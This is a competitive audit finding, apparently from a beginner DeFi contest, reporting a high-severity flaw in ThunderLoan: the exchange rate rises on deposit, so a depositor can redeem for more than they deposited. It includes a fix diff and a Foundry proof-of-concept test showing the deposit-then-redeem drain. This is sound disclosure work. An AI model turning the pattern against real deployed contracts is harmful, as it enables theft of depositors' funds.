First Flight #3: Thunder Loan
First Flight #3
Beginner FriendlyFoundryDeFiOracle
100 EXP
View results
Previous Next
Submission Details
Severity: high
Valid

Updating exchange rate on token deposit will inflate asset token's exchange rate faster than expected

zxarcs

Summary

Exchange rate for asset token is updated on deposit. This means users can deposit (which will increase exchange rate), and then immediately withdraw more underlying tokens than they deposited.

Details

Per documentation:

Liquidity providers can deposit assets into ThunderLoan and be given AssetTokens in return. These AssetTokens gain interest over time depending on how often people take out flash loans!

Asset tokens gain interest when people take out flash loans with the underlying tokens. In current version of ThunderLoan, exchange rate is also updated when user deposits underlying tokens.

This does not match with documentation and will end up causing exchange rate to increase on deposit.

This will allow anyone who deposits to immediately withdraw and get more tokens back than they deposited. Underlying of any asset token can be completely drained in this manner.

Filename

src/protocol/ThunderLoan.sol

Permalinks

https://github.com/Cyfrin/2023-11-Thunder-Loan/blob/8539c83865eb0d6149e4d70f37a35d9e72ac7404/src/protocol/ThunderLoan.sol#L153-L154

Impact

Users can deposit and immediately withdraw more funds. Since exchange rate is increased on deposit, they will withdraw more funds then they deposited without any flash loans being taken at all.

Recommendations

It is recommended to not update exchange rate on deposits and updated it only when flash loans are taken, as per documentation.

function deposit(IERC20 token, uint256 amount) external revertIfZero(amount) revertIfNotAllowedToken(token) {
AssetToken assetToken = s_tokenToAssetToken[token];
uint256 exchangeRate = assetToken.getExchangeRate();
uint256 mintAmount = (amount * assetToken.EXCHANGE_RATE_PRECISION()) / exchangeRate;
emit Deposit(msg.sender, token, amount);
assetToken.mint(msg.sender, mintAmount);
- uint256 calculatedFee = getCalculatedFee(token, amount);
- assetToken.updateExchangeRate(calculatedFee);
token.safeTransferFrom(msg.sender, address(assetToken), amount);
}

Tools Used

  • Manual Audit

  • Foundry

POC

function testExchangeRateUpdatedOnDeposit() public setAllowedToken {
tokenA.mint(liquidityProvider, AMOUNT);
tokenA.mint(user, AMOUNT);
// deposit some tokenA into ThunderLoan
vm.startPrank(liquidityProvider);
tokenA.approve(address(thunderLoan), AMOUNT);
thunderLoan.deposit(tokenA, AMOUNT);
vm.stopPrank();
// another user also makes a deposit
vm.startPrank(user);
tokenA.approve(address(thunderLoan), AMOUNT);
thunderLoan.deposit(tokenA, AMOUNT);
vm.stopPrank();
AssetToken assetToken = thunderLoan.getAssetFromToken(tokenA);
// after a deposit, asset token's exchange rate has aleady increased
// this is only supposed to happen when users take flash loans with underlying
assertGt(assetToken.getExchangeRate(), 1 * assetToken.EXCHANGE_RATE_PRECISION());
// now liquidityProvider withdraws and gets more back because exchange
// rate is increased but no flash loans were taken out yet
// repeatedly doing this could drain all underlying for any asset token
vm.startPrank(liquidityProvider);
thunderLoan.redeem(tokenA, assetToken.balanceOf(liquidityProvider));
vm.stopPrank();
assertGt(tokenA.balanceOf(liquidityProvider), AMOUNT);
}
Updates

Lead Judging Commences

0xnevi Lead Judge
over 1 year ago
0xnevi Lead Judge over 1 year ago
Submission Judgement Published
Validated
Assigned finding tags:

can't redeem because of the update exchange rate

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.